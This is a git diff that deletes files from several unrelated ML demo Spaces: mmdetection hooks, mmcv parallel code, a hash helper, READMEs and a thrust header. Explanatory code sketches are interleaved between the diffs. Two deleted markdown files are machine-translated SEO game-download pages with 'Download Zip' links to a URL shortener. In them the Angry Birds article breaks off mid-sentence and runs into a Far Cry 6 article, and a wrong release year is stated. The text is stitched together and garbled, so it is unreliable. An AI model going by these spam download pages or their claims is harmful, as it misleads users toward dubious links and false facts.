- pos_inds = pos_inds.squeeze(1)
- if pos_inds.numel() <= num_expected:
- return pos_inds
- else:
- return self.hard_mining(pos_inds, num_expected, bboxes[pos_inds],
- assign_result.labels[pos_inds], feats)
-
- def _sample_neg(self,
- assign_result,
- num_expected,
- bboxes=None,
- feats=None,
- **kwargs):
- """Sample negative boxes.
-
- Args:
- assign_result (:obj:`AssignResult`): Assigned results
- num_expected (int): Number of expected negative samples
- bboxes (torch.Tensor, optional): Boxes. Defaults to None.
- feats (list[torch.Tensor], optional): Multi-level features.
- Defaults to None.
-
- Returns:
- torch.Tensor: Indices of negative samples
- """
- # Sample some hard negative samples
- neg_inds = torch.nonzero(assign_result.gt_inds == 0, as_tuple=False)
- if neg_inds.numel() != 0:
- neg_inds = neg_inds.squeeze(1)
- if len(neg_inds) <= num_expected:
- return neg_inds
- else:
- neg_labels = assign_result.labels.new_empty(
- neg_inds.size(0)).fill_(self.bbox_head.num_classes)
- return self.hard_mining(neg_inds, num_expected, bboxes[neg_inds],
- neg_labels, feats)
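The deleted sampler's `hard_mining` boils down to scoring every candidate with its unreduced loss and keeping the top-k hardest. A standalone sketch of that idea with toy tensors (plain PyTorch, not mmdetection code) follows.

```python
# Sketch of online hard example mining: keep the k samples with the largest loss.
import torch
import torch.nn.functional as F

def hard_mining(logits, labels, inds, num_expected):
    # Per-sample loss with no reduction, mirroring reduction_override='none'.
    loss = F.cross_entropy(logits, labels, reduction='none')
    _, topk_loss_inds = loss.topk(min(num_expected, loss.numel()))
    return inds[topk_loss_inds]

logits = torch.randn(128, 81)          # toy scores: 80 classes + background
labels = torch.randint(0, 81, (128,))  # toy labels
inds = torch.arange(128)
hard_inds = hard_mining(logits, labels, inds, num_expected=32)
print(hard_inds.shape)                 # torch.Size([32])
```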
diff --git a/spaces/Andy1621/uniformer_image_detection/mmdet/core/evaluation/eval_hooks.py b/spaces/Andy1621/uniformer_image_detection/mmdet/core/evaluation/eval_hooks.py
deleted file mode 100644
index 6fb932eae1ccb23a2b687a05a6cb9525200de718..0000000000000000000000000000000000000000
--- a/spaces/Andy1621/uniformer_image_detection/mmdet/core/evaluation/eval_hooks.py
+++ /dev/null
@@ -1,303 +0,0 @@
-import os.path as osp
-import warnings
-from math import inf
-
-import mmcv
-import torch.distributed as dist
-from mmcv.runner import Hook
-from torch.nn.modules.batchnorm import _BatchNorm
-from torch.utils.data import DataLoader
-
-from mmdet.utils import get_root_logger
-
-
-class EvalHook(Hook):
- """Evaluation hook.
-
- Notes:
- If new arguments are added for EvalHook, tools/test.py,
- tools/analysis_tools/eval_metric.py may be affected.
-
- Attributes:
- dataloader (DataLoader): A PyTorch dataloader.
- start (int, optional): Evaluation starting epoch. It enables evaluation
- before the training starts if ``start`` <= the resuming epoch.
- If None, whether to evaluate is merely decided by ``interval``.
- Default: None.
- interval (int): Evaluation interval (by epochs). Default: 1.
- save_best (str, optional): If a metric is specified, it would measure
- the best checkpoint during evaluation. The information about best
- checkpoint would be saved in best.json.
- Options are the evaluation metrics to the test dataset. e.g.,
- ``bbox_mAP``, ``segm_mAP`` for bbox detection and instance
- segmentation. ``AR@100`` for proposal recall. If ``save_best`` is
- ``auto``, the first key will be used. The interval of
- ``CheckpointHook`` should divide that of ``EvalHook``. Default: None.
- rule (str, optional): Comparison rule for best score. If set to None,
- it will infer a reasonable rule. Keys such as 'mAP' or 'AR' will
- be inferred by 'greater' rule. Keys contain 'loss' will be inferred
- by 'less' rule. Options are 'greater', 'less'. Default: None.
- **eval_kwargs: Evaluation arguments fed into the evaluate function of
- the dataset.
- """
-
- rule_map = {'greater': lambda x, y: x > y, 'less': lambda x, y: x < y}
- init_value_map = {'greater': -inf, 'less': inf}
- greater_keys = ['mAP', 'AR']
- less_keys = ['loss']
-
- def __init__(self,
- dataloader,
- start=None,
- interval=1,
- by_epoch=True,
- save_best=None,
- rule=None,
- **eval_kwargs):
- if not isinstance(dataloader, DataLoader):
- raise TypeError('dataloader must be a pytorch DataLoader, but got'
- f' {type(dataloader)}')
- if not interval > 0:
- raise ValueError(f'interval must be positive, but got {interval}')
- if start is not None and start < 0:
- warnings.warn(
- f'The evaluation start epoch {start} is smaller than 0, '
- f'use 0 instead', UserWarning)
- start = 0
- self.dataloader = dataloader
- self.interval = interval
- self.by_epoch = by_epoch
- self.start = start
- assert isinstance(save_best, str) or save_best is None
- self.save_best = save_best
- self.eval_kwargs = eval_kwargs
- self.initial_epoch_flag = True
-
- self.logger = get_root_logger()
-
- if self.save_best is not None:
- self._init_rule(rule, self.save_best)
-
- def _init_rule(self, rule, key_indicator):
- """Initialize rule, key_indicator, comparison_func, and best score.
-
- Args:
- rule (str | None): Comparison rule for best score.
- key_indicator (str | None): Key indicator to determine the
- comparison rule.
- """
- if rule not in self.rule_map and rule is not None:
- raise KeyError(f'rule must be greater, less or None, '
- f'but got {rule}.')
-
- if rule is None:
- if key_indicator != 'auto':
- if any(key in key_indicator for key in self.greater_keys):
- rule = 'greater'
- elif any(key in key_indicator for key in self.less_keys):
- rule = 'less'
- else:
- raise ValueError(f'Cannot infer the rule for key '
- f'{key_indicator}, thus a specific rule '
- f'must be specified.')
- self.rule = rule
- self.key_indicator = key_indicator
- if self.rule is not None:
- self.compare_func = self.rule_map[self.rule]
-
- def before_run(self, runner):
- if self.save_best is not None:
- if runner.meta is None:
- warnings.warn('runner.meta is None. Creating an empty one.')
- runner.meta = dict()
- runner.meta.setdefault('hook_msgs', dict())
-
- def before_train_epoch(self, runner):
- """Evaluate the model only at the start of training."""
- if not self.initial_epoch_flag:
- return
- if self.start is not None and runner.epoch >= self.start:
- self.after_train_epoch(runner)
- self.initial_epoch_flag = False
-
- def evaluation_flag(self, runner):
- """Judge whether to perform_evaluation after this epoch.
-
- Returns:
- bool: The flag indicating whether to perform evaluation.
- """
- if self.start is None:
- if not self.every_n_epochs(runner, self.interval):
- # No evaluation during the interval epochs.
- return False
- elif (runner.epoch + 1) < self.start:
- # No evaluation if start is larger than the current epoch.
- return False
- else:
- # Evaluation only at epochs 3, 5, 7... if start==3 and interval==2
- if (runner.epoch + 1 - self.start) % self.interval:
- return False
- return True
-
- def after_train_epoch(self, runner):
- if not self.by_epoch or not self.evaluation_flag(runner):
- return
- from mmdet.apis import single_gpu_test
- results = single_gpu_test(runner.model, self.dataloader, show=False)
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
-
- def after_train_iter(self, runner):
- if self.by_epoch or not self.every_n_iters(runner, self.interval):
- return
- from mmdet.apis import single_gpu_test
- results = single_gpu_test(runner.model, self.dataloader, show=False)
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
-
- def save_best_checkpoint(self, runner, key_score):
- best_score = runner.meta['hook_msgs'].get(
- 'best_score', self.init_value_map[self.rule])
- if self.compare_func(key_score, best_score):
- best_score = key_score
- runner.meta['hook_msgs']['best_score'] = best_score
- last_ckpt = runner.meta['hook_msgs']['last_ckpt']
- runner.meta['hook_msgs']['best_ckpt'] = last_ckpt
- mmcv.symlink(
- last_ckpt,
- osp.join(runner.work_dir, f'best_{self.key_indicator}.pth'))
- time_stamp = runner.epoch + 1 if self.by_epoch else runner.iter + 1
- self.logger.info(f'Now best checkpoint is epoch_{time_stamp}.pth. '
- f'Best {self.key_indicator} is {best_score:0.4f}')
-
- def evaluate(self, runner, results):
- eval_res = self.dataloader.dataset.evaluate(
- results, logger=runner.logger, **self.eval_kwargs)
- for name, val in eval_res.items():
- runner.log_buffer.output[name] = val
- runner.log_buffer.ready = True
- if self.save_best is not None:
- if self.key_indicator == 'auto':
- # infer from eval_results
- self._init_rule(self.rule, list(eval_res.keys())[0])
- return eval_res[self.key_indicator]
- else:
- return None
-
-
-class DistEvalHook(EvalHook):
- """Distributed evaluation hook.
-
- Notes:
- If new arguments are added, tools/test.py may be affected.
-
- Attributes:
- dataloader (DataLoader): A PyTorch dataloader.
- start (int, optional): Evaluation starting epoch. It enables evaluation
- before the training starts if ``start`` <= the resuming epoch.
- If None, whether to evaluate is merely decided by ``interval``.
- Default: None.
- interval (int): Evaluation interval (by epochs). Default: 1.
- tmpdir (str | None): Temporary directory to save the results of all
- processes. Default: None.
- gpu_collect (bool): Whether to use gpu or cpu to collect results.
- Default: False.
- save_best (str, optional): If a metric is specified, it would measure
- the best checkpoint during evaluation. The information about best
- checkpoint would be saved in best.json.
- Options are the evaluation metrics to the test dataset. e.g.,
- ``bbox_mAP``, ``segm_mAP`` for bbox detection and instance
- segmentation. ``AR@100`` for proposal recall. If ``save_best`` is
- ``auto``, the first key will be used. The interval of
- ``CheckpointHook`` should divide that of ``EvalHook``. Default: None.
- rule (str | None): Comparison rule for best score. If set to None,
- it will infer a reasonable rule. Default: 'None'.
- broadcast_bn_buffer (bool): Whether to broadcast the
- buffer(running_mean and running_var) of rank 0 to other rank
- before evaluation. Default: True.
- **eval_kwargs: Evaluation arguments fed into the evaluate function of
- the dataset.
- """
-
- def __init__(self,
- dataloader,
- start=None,
- interval=1,
- by_epoch=True,
- tmpdir=None,
- gpu_collect=False,
- save_best=None,
- rule=None,
- broadcast_bn_buffer=True,
- **eval_kwargs):
- super().__init__(
- dataloader,
- start=start,
- interval=interval,
- by_epoch=by_epoch,
- save_best=save_best,
- rule=rule,
- **eval_kwargs)
- self.broadcast_bn_buffer = broadcast_bn_buffer
- self.tmpdir = tmpdir
- self.gpu_collect = gpu_collect
-
- def _broadcast_bn_buffer(self, runner):
- # Synchronization of BatchNorm's buffer (running_mean
- # and running_var) is not supported in the DDP of pytorch,
- # which may cause the inconsistent performance of models in
- # different ranks, so we broadcast BatchNorm's buffers
- # of rank 0 to other ranks to avoid this.
- if self.broadcast_bn_buffer:
- model = runner.model
- for name, module in model.named_modules():
- if isinstance(module,
- _BatchNorm) and module.track_running_stats:
- dist.broadcast(module.running_var, 0)
- dist.broadcast(module.running_mean, 0)
-
- def after_train_epoch(self, runner):
- if not self.by_epoch or not self.evaluation_flag(runner):
- return
-
- if self.broadcast_bn_buffer:
- self._broadcast_bn_buffer(runner)
-
- from mmdet.apis import multi_gpu_test
- tmpdir = self.tmpdir
- if tmpdir is None:
- tmpdir = osp.join(runner.work_dir, '.eval_hook')
- results = multi_gpu_test(
- runner.model,
- self.dataloader,
- tmpdir=tmpdir,
- gpu_collect=self.gpu_collect)
- if runner.rank == 0:
- print('\n')
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
-
- def after_train_iter(self, runner):
- if self.by_epoch or not self.every_n_iters(runner, self.interval):
- return
-
- if self.broadcast_bn_buffer:
- self._broadcast_bn_buffer(runner)
-
- from mmdet.apis import multi_gpu_test
- tmpdir = self.tmpdir
- if tmpdir is None:
- tmpdir = osp.join(runner.work_dir, '.eval_hook')
- results = multi_gpu_test(
- runner.model,
- self.dataloader,
- tmpdir=tmpdir,
- gpu_collect=self.gpu_collect)
- if runner.rank == 0:
- print('\n')
- key_score = self.evaluate(runner, results)
- if self.save_best:
- self.save_best_checkpoint(runner, key_score)
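For reference, a hedged sketch of how hooks like these are typically enabled from an mmdetection-style config; the keys follow the docstrings above, while the metric and `save_best` values are placeholders rather than settings taken from this repository.

```python
# Sketch only: an `evaluation` dict whose entries are forwarded to EvalHook/DistEvalHook.
evaluation = dict(
    interval=1,             # evaluate every epoch
    metric='bbox',          # passed through **eval_kwargs to dataset.evaluate()
    save_best='bbox_mAP',   # symlink best_bbox_mAP.pth; 'auto' would pick the first key
    rule='greater',         # optional; inferred from 'mAP'/'AR' vs 'loss' when None
)
```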
diff --git a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py b/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py
deleted file mode 100644
index 79b5f69b654cf647dc7ae9174223781ab5c607d2..0000000000000000000000000000000000000000
--- a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/parallel/data_parallel.py
+++ /dev/null
@@ -1,89 +0,0 @@
-# Copyright (c) OpenMMLab. All rights reserved.
-from itertools import chain
-
-from torch.nn.parallel import DataParallel
-
-from .scatter_gather import scatter_kwargs
-
-
-class MMDataParallel(DataParallel):
- """The DataParallel module that supports DataContainer.
-
- MMDataParallel has two main differences with PyTorch DataParallel:
-
- - It supports a custom type :class:`DataContainer` which allows more
- flexible control of input data during both GPU and CPU inference.
- - It implements two more APIs ``train_step()`` and ``val_step()``.
-
- Args:
- module (:class:`nn.Module`): Module to be encapsulated.
- device_ids (list[int]): Device IDS of modules to be scattered to.
- Defaults to None when GPU is not available.
- output_device (str | int): Device ID for output. Defaults to None.
- dim (int): Dimension used to scatter the data. Defaults to 0.
- """
-
- def __init__(self, *args, dim=0, **kwargs):
- super(MMDataParallel, self).__init__(*args, dim=dim, **kwargs)
- self.dim = dim
-
- def forward(self, *inputs, **kwargs):
- """Override the original forward function.
-
- The main difference lies in the CPU inference where the data in
- :class:`DataContainers` will still be gathered.
- """
- if not self.device_ids:
- # We add the following line thus the module could gather and
- # convert data containers as those in GPU inference
- inputs, kwargs = self.scatter(inputs, kwargs, [-1])
- return self.module(*inputs[0], **kwargs[0])
- else:
- return super().forward(*inputs, **kwargs)
-
- def scatter(self, inputs, kwargs, device_ids):
- return scatter_kwargs(inputs, kwargs, device_ids, dim=self.dim)
-
- def train_step(self, *inputs, **kwargs):
- if not self.device_ids:
- # We add the following line thus the module could gather and
- # convert data containers as those in GPU inference
- inputs, kwargs = self.scatter(inputs, kwargs, [-1])
- return self.module.train_step(*inputs[0], **kwargs[0])
-
- assert len(self.device_ids) == 1, \
- ('MMDataParallel only supports single GPU training, if you need to'
- ' train with multiple GPUs, please use MMDistributedDataParallel'
- ' instead.')
-
- for t in chain(self.module.parameters(), self.module.buffers()):
- if t.device != self.src_device_obj:
- raise RuntimeError(
- 'module must have its parameters and buffers '
- f'on device {self.src_device_obj} (device_ids[0]) but '
- f'found one of them on device: {t.device}')
-
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- return self.module.train_step(*inputs[0], **kwargs[0])
-
- def val_step(self, *inputs, **kwargs):
- if not self.device_ids:
- # We add the following line thus the module could gather and
- # convert data containers as those in GPU inference
- inputs, kwargs = self.scatter(inputs, kwargs, [-1])
- return self.module.val_step(*inputs[0], **kwargs[0])
-
- assert len(self.device_ids) == 1, \
- ('MMDataParallel only supports single GPU training, if you need to'
- ' train with multiple GPUs, please use MMDistributedDataParallel'
- ' instead.')
-
- for t in chain(self.module.parameters(), self.module.buffers()):
- if t.device != self.src_device_obj:
- raise RuntimeError(
- 'module must have its parameters and buffers '
- f'on device {self.src_device_obj} (device_ids[0]) but '
- f'found one of them on device: {t.device}')
-
- inputs, kwargs = self.scatter(inputs, kwargs, self.device_ids)
- return self.module.val_step(*inputs[0], **kwargs[0])
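A minimal sketch of wrapping a module with the deleted `MMDataParallel`; the toy model, single available GPU, and tensor shapes are assumptions, and `train_step()`/`val_step()` would additionally require the wrapped module to define those methods itself.

```python
# Sketch only: single-GPU forward through MMDataParallel.
import torch
import torch.nn as nn
from mmcv.parallel import MMDataParallel

model = nn.Sequential(nn.Linear(8, 4), nn.ReLU(), nn.Linear(4, 2))
model = MMDataParallel(model.cuda(), device_ids=[0])

x = torch.randn(16, 8).cuda()
out = model(x)        # ordinary forward, scattered to device_ids[0]
print(out.shape)      # torch.Size([16, 2])
```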
diff --git a/spaces/Banbri/zcvzcv/src/lib/computeSha256.ts b/spaces/Banbri/zcvzcv/src/lib/computeSha256.ts
deleted file mode 100644
index cb6ef0604fca9653408012fd6cef2a58b6acaf47..0000000000000000000000000000000000000000
--- a/spaces/Banbri/zcvzcv/src/lib/computeSha256.ts
+++ /dev/null
@@ -1,14 +0,0 @@
-import { createHash } from 'node:crypto'
-
-/**
- * Returns a SHA3-256 hash (hex-encoded) of the given `strContent`.
- *
- * @see https://en.wikipedia.org/wiki/SHA-3
- *
- * @param {String} strContent
- *
- * @returns {String}
- */
-export function computeSha256(strContent: string) {
- return createHash('sha3-256').update(strContent).digest('hex')
-}
\ No newline at end of file
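For illustration only, a Python equivalent of the same SHA3-256 hex digest; the TypeScript helper above is the actual implementation.

```python
# Sketch: mirrors createHash('sha3-256').update(strContent).digest('hex').
import hashlib

def compute_sha256(content: str) -> str:
    return hashlib.sha3_256(content.encode('utf-8')).hexdigest()

print(compute_sha256('hello'))  # 64-character hex string
```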
diff --git a/spaces/Benson/text-generation/Examples/Angry Birds Star Wars 2 Descarga Juego Para Pc Versin Completa.md b/spaces/Benson/text-generation/Examples/Angry Birds Star Wars 2 Descarga Juego Para Pc Versin Completa.md
deleted file mode 100644
index 4b942e8dfe1911e9011e8a26f906d8ad28623ecb..0000000000000000000000000000000000000000
--- a/spaces/Benson/text-generation/Examples/Angry Birds Star Wars 2 Descarga Juego Para Pc Versin Completa.md
+++ /dev/null
@@ -1,66 +0,0 @@
-
-Angry Birds Star Wars 2: How to Download and Play on PC
-Are you a fan of Angry Birds and Star Wars? If so, you will love Angry Birds Star Wars 2, the sequel to the popular crossover game that combines the best of both worlds. In this article, we will show you how to download and play Angry Birds Star Wars 2 on your PC, along with some features and tips that will make your gaming experience more enjoyable.
-angry birds star wars 2 download game for pc full version
-Download Zip ··· https://bltlly.com/2v6IV4
-Introduction
-What is Angry Birds Star Wars 2?
-Angry Birds Star Wars 2 is a casual game developed by Rovio Entertainment Corporation, based on the Star Wars prequel trilogy. The game follows the story of the films, with some twists and humor added by the Angry Birds characters. You can play as the Bird Side or the Pork Side, using various characters, weapons, and abilities inspired by the Star Wars universe. The game has more than 200 levels, plus bonus levels, achievements, and rewards that you can unlock by collecting stars and coins.
-Why play Angry Birds Star Wars 2 on PC?
-While Angry Birds Star Wars 2 was originally designed for mobile devices, playing it on PC has many advantages. For one, you can enjoy the game on a bigger screen, with better graphics and sound quality. You can also use the mouse and keyboard to control the game more easily, without worrying about your fingers blocking the view or running out of battery. Playing on PC also gives you access to some features that are not available on mobile devices, such as BlueStacks enhancements that can improve your gaming experience.
-How to download and play Angry Birds Star Wars 2 on PC
-Method 1: Using the BlueStacks emulator
-BlueStacks is an Android emulator that lets you run Android apps and games on your PC. It is one of the most popular and reliable emulators on the market, with more than 500 million users worldwide. Here are the steps to download and play Angry Birds Star Wars 2 on PC using BlueStacks:
-
-To download BlueStacks, go to https://www.bluestacks.com/apps/casual/angry-birds-star-wars-2-on-pc.html and click the Download Angry Birds Star Wars 2 on PC button. This will download the BlueStacks installer to your PC. To install BlueStacks, double-click the installer and follow the on-screen instructions. The installation process may take a few minutes, depending on your PC's specifications.
-Step 2: Complete the Google sign-in to access the Play Store
-After installing BlueStacks, launch it and complete the Google sign-in process. This will let you access the Google Play Store, where you can find and download Angry Birds Star Wars 2. If you already have a Google account, you can use it to sign in. If not, you can create one for free.
-Step 3: Search for Angry Birds Star Wars 2 in the search bar
-Once you are in the Play Store, search for Angry Birds Star Wars 2 in the search bar in the top-right corner of the screen. You can also browse the Casual category to find the game.
-
-Step 4: Click to install Angry Birds Star Wars 2 from the search results
-When you see Angry Birds Star Wars 2 in the search results, click it to open its page. Then click the Install button to start downloading and installing the game on your PC. This may take a few minutes, depending on your internet speed and PC performance.
-Step 5: Click the Angry Birds Star Wars 2 icon on the home screen to start playing
-After installing Angry Birds Star Wars 2, you can find its icon on the BlueStacks home screen. Click it to launch the game and start playing. You can also access the game from your desktop or Start menu.
-Method 2: Using the Rovio website
-
-Step 1: Go to the Rovio website and click Angry Birds Star Wars 2
-To go to the Rovio website, visit https://bltlly.com/2v6Mka
-Far Cry 6 was released worldwide on October 7, 2023, for PlayStation 4, PlayStation 5, Xbox One, Xbox Series X/S, PC, Stadia, and Amazon Luna. If you are wondering how to download Far Cry 6 on your preferred platform, you have come to the right place. In this article, we will show you everything you need to know about downloading Far Cry 6, including the pre-order bonuses, the system requirements, and step-by-step guides for each platform.
- Far Cry 6 pre-order bonuses
-If you pre-ordered any edition of Far Cry 6 before its release date, you will get some exclusive bonuses that will enhance your gaming experience. These bonuses include:
-
-- Discos Locos - a deadly disc-launcher weapon whose discs can bounce off walls and enemies.
-- Libertad Chorizo - a skin for Chorizo, the adorable dachshund companion.
-
-To get these bonuses, you will need to redeem a code that comes with your confirmation email or pre-order receipt. Depending on your platform, you will need to enter this code in the PlayStation Store, Microsoft Store, Epic Games Store, Ubisoft Store, Ubisoft+, the Stadia app or website, or the Luna app or website. Once you redeem the code, you will be able to access the bonuses in the game.
- Far Cry 6 system requirements
-If you are planning to play Far Cry 6 on PC, you will need to make sure your system meets the minimum or recommended requirements for the game. Here is a table of the Far Cry 6 system requirements:
-
-
-| Minimum requirements | Recommended requirements |
-| --- | --- |
-| CPU: AMD Ryzen 3 1200 - 3.1 GHz / Intel i5-4460 - 3.2 GHz | CPU: AMD Ryzen 5 3600X - 3.8 GHz / Intel i7-7700 - 3.6 GHz |
-| GPU: AMD RX 460 - 4 GB / NVIDIA GTX 960 - 4 GB | GPU: AMD RX VEGA64 - 8 GB / NVIDIA GTX 1080 - 8 GB |
-| RAM: 8 GB (dual-channel mode) | RAM: 16 GB (dual-channel mode) |
-| Storage: 60 GB HDD (SSD recommended) | Storage: 60 GB HDD (SSD recommended) |
-| OS: Windows 10 (64-bit) | OS: Windows 10 (64-bit) |
-
- You can also check your PC's compatibility with Far Cry 6 using the Ubisoft Connect app, which will scan your system and compare it against the game's requirements. You can download the Ubisoft Connect app from the Ubisoft Store or the Ubisoft website.
- How to download Far Cry 6 on PC
-If you want to play Far Cry 6 on PC, you have several options to choose from. You can buy and download the game from the Epic Games Store, the Ubisoft Store, or Ubisoft+, Ubisoft's subscription service that gives you access to more than 100 games. Here is how to download Far Cry 6 on PC from each platform:
- Epic Games Store
-
-- Launch the Epic Games Launcher on your PC, or download it from the Epic Games website if you do not have it.
-- Sign in with your Epic Games account, or create one if you do not have one.
-- Go to the Store tab and search for Far Cry 6, or click this link to go directly to the game's page.
-- Select the edition of Far Cry 6 you want to buy, and click Buy Now.
-- Enter your payment details and confirm your purchase.
-- Go to the Library tab and click Far Cry 6 to start downloading the game.
-- Once the download is complete, click Launch to start playing the game.
-
- Ubisoft Store
-
-
-- Sign in with your Ubisoft account, or create one if you do not have one.
-- Go to the Store tab and search for Far Cry 6, or click this link to go directly to the game's page.
-- Select the edition of Far Cry 6 you want to buy, and click Add to Cart.
-- Click Checkout, enter your payment details, and confirm your purchase.
-- Go to the Games tab and click Far Cry 6 to start downloading the game.
-- Once the download is complete, click Play to start playing.
-
- Ubisoft+
-
-- Go to the Ubisoft+ website and sign in with your Ubisoft account, or create one if you do not have one.
-- Click Subscribe Now and choose a monthly or annual plan. You will get a free trial for seven days if you are a new subscriber.
-- Enter your payment details and confirm your subscription.
-- Launch the Ubisoft Connect app on your PC, or download it from the Ubisoft Store or the Ubisoft website if you do not have it.
-- Go to the Games tab and click Far Cry 6 to start downloading the game. You will have access to the Ultimate Edition of Far Cry 6, which includes all DLC and additional content.
-- Once the download is complete, click Play to start playing.
-
- How to download Far Cry 6 on PlayStation
- If you want to play Far Cry 6 on PlayStation 4 or PlayStation 5, you can buy and download the game from the PlayStation Store. Here is how to download Far Cry 6 on PlayStation:
-
-
- - Turn on your PlayStation console and sign in with your PlayStation Network account, or create one if you do not have one.
- - Go to the PlayStation Store icon on the home screen and select it.
- - Search for Far Cry 6, or click this link (for PS4) or this link (for PS5) to go directly to the game's page.
- - Select the edition of Far Cry 6 you want to buy, and click Add to Cart.
-
-- Go to your Library and select Purchased. Find Far Cry 6 and click Download.
-- Once the download is complete, you can launch the game from your home screen or Library.
-
- How to download Far Cry 6 on Xbox
-If you want to play Far Cry 6 on Xbox One or Xbox Series X/S, you can buy and download the game from the Microsoft Store. Here is how to download Far Cry 6 on Xbox:
-
-- Turn on your Xbox console and sign in with your Microsoft account, or create one if you do not have one.
-- Go to the Microsoft Store icon on the home screen and select it.
-- Search for Far Cry 6, or click this link (for Xbox One) or this link (for Xbox Series X/S) to go directly to the game's page.
-- Select the edition of Far Cry 6 you want to buy, and click Buy Now.
-- Enter your payment details and confirm your purchase.
-- The game will start downloading automatically. You can check the progress in the Queue section of the My Games & Apps menu.
-- Once the download is complete, you can launch the game from the home screen or the My Games & Apps menu.
-
- How to download Far Cry 6 on Stadia
-If you want to play Far Cry 6 on Stadia, you can buy and stream the game from the Stadia app or website. Here is how to download Far Cry 6 on Stadia:
-
-- Go to the Stadia app or website and sign in with your Google account, or create one if you do not have one.
-- Search for Far Cry 6, or click this link to go directly to the game's page.
-- Select the edition of Far Cry 6 you want to buy, and click Buy.
-- Enter your payment details and confirm your purchase.
-- The game will be added to your library. You can start playing it by clicking Play.
-
- How to download Far Cry 6 on Amazon Luna
-
-
-- Go to the Luna app or website and sign in with your Amazon account, or create one if you do not have one.
-- Search for Far Cry 6, or click this link to go directly to the game's page.
-- Select the edition of Far Cry 6 you want to buy, and click Buy Now.
-- Enter your payment details and confirm your purchase.
-- The game will be added to your library. You can start playing it by clicking Play.
-
- Conclusion
- Far Cry 6 is an exciting action-adventure game that lets you explore a large open-world island, fight a ruthless dictator, and customize your weapons and vehicles. Whether you play on PC, PlayStation, Xbox, Stadia, or Amazon Luna, you can easily download Far Cry 6 by following the guides above. Do not miss this chance to join the revolution and free Yara from Antón Castillo's oppression. Pre-order or buy Far Cry 6 today and get ready for an unforgettable gaming experience.
- Frequently asked questions
- Q: How big is Far Cry 6?
- A: According to Ubisoft, Far Cry 6 is around 50 GB in size for PC, PlayStation, and Xbox. For Stadia and Amazon Luna, the size may vary depending on your internet connection and streaming quality.
- Q: Can I play Far Cry 6 offline?
- A: Yes, you can play Far Cry 6 offline in single-player mode. However, you will need an internet connection for some features, such as co-op multiplayer, cloud saves, leaderboards, and updates.
- Q: Can I play Far Cry 6 with my friends?
- A: Yes, you can play Far Cry 6 with your friends in co-op multiplayer mode. You can invite up to three friends to join your game and explore Yara together. You can also use cross-play and cross-progression features to play with friends on different platforms and devices.
-
- Q: What is the difference between the Standard, Gold, Ultimate, and Collector's editions of Far Cry 6?
- A: The Standard Edition of Far Cry 6 includes the base game and the pre-order bonuses. The Gold Edition includes the base game, the pre-order bonuses, and the Season Pass, which gives you access to three DLCs and more content. The Ultimate Edition includes everything in the Gold Edition, plus the Ultimate Pack, which contains four cosmetic packs: the Croc Hunter Pack, the Vice Pack, the Jungle Expedition Pack, and the Blood Dragon Pack. The Collector's Edition includes everything in the Ultimate Edition, plus a physical replica of Tostador, a flamethrower from the game, a steelbook, an art book, a map of Yara, a soundtrack CD, a sticker set, and a keychain.
-
-
\ No newline at end of file
diff --git a/spaces/Bonosa2/dall-e_image-generation/README.md b/spaces/Bonosa2/dall-e_image-generation/README.md
deleted file mode 100644
index 279a2722cd167e71289700c972877704a79b3503..0000000000000000000000000000000000000000
--- a/spaces/Bonosa2/dall-e_image-generation/README.md
+++ /dev/null
@@ -1,12 +0,0 @@
----
-title: Dall-e Image-generation
-emoji: 📉
-colorFrom: pink
-colorTo: indigo
-sdk: gradio
-sdk_version: 3.29.0
-app_file: app.py
-pinned: false
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/CVPR/Dual-Key_Backdoor_Attacks/openvqa/docs/_source/advanced/contributing.md b/spaces/CVPR/Dual-Key_Backdoor_Attacks/openvqa/docs/_source/advanced/contributing.md
deleted file mode 100644
index ad69fc0e40a1bbe39f63d5d594ec01f0db463e7f..0000000000000000000000000000000000000000
--- a/spaces/CVPR/Dual-Key_Backdoor_Attacks/openvqa/docs/_source/advanced/contributing.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Contributing to OpenVQA
-
-All kinds of contributions are welcome, including but not limited to the following.
-
-- Fixes (typo, bugs)
-- New features and components
-
-## Workflow
-
-1. fork and pull the latest version of OpenVQA
-2. checkout a new branch (do not use master branch for PRs)
-3. commit your changes
-4. create a PR
-
-## Code style
-
-### Python
-We adopt [PEP8](https://www.python.org/dev/peps/pep-0008/) as the preferred code style.
-We use [flake8](http://flake8.pycqa.org/en/latest/) as the linter and [yapf](https://github.com/google/yapf) as the formatter.
-Please upgrade to the latest yapf (>=0.27.0) and refer to the configuration.
-
->Before you create a PR, make sure that your code lints and is formatted by yapf.
-
-### C++ and CUDA
-We follow the [Google C++ Style Guide](https://google.github.io/styleguide/cppguide.html).
-
-
-
-
diff --git a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/replace.h b/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/replace.h
deleted file mode 100644
index 6167f711ad16ce3015df0c892394788f317680b2..0000000000000000000000000000000000000000
--- a/spaces/CVPR/LIVE/thrust/thrust/system/detail/generic/replace.h
+++ /dev/null
@@ -1,98 +0,0 @@
-/*
- * Copyright 2008-2013 NVIDIA Corporation
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-
-#pragma once
-
-#include <thrust/detail/config.h>
-#include <thrust/system/detail/generic/tag.h>
-
-namespace thrust
-{
-namespace system
-{
-namespace detail
-{
-namespace generic
-{
-
-
-template<typename DerivedPolicy, typename InputIterator, typename OutputIterator, typename Predicate, typename T>
-__host__ __device__
-  OutputIterator replace_copy_if(thrust::execution_policy<DerivedPolicy> &exec,
- InputIterator first,
- InputIterator last,
- OutputIterator result,
- Predicate pred,
- const T &new_value);
-
-
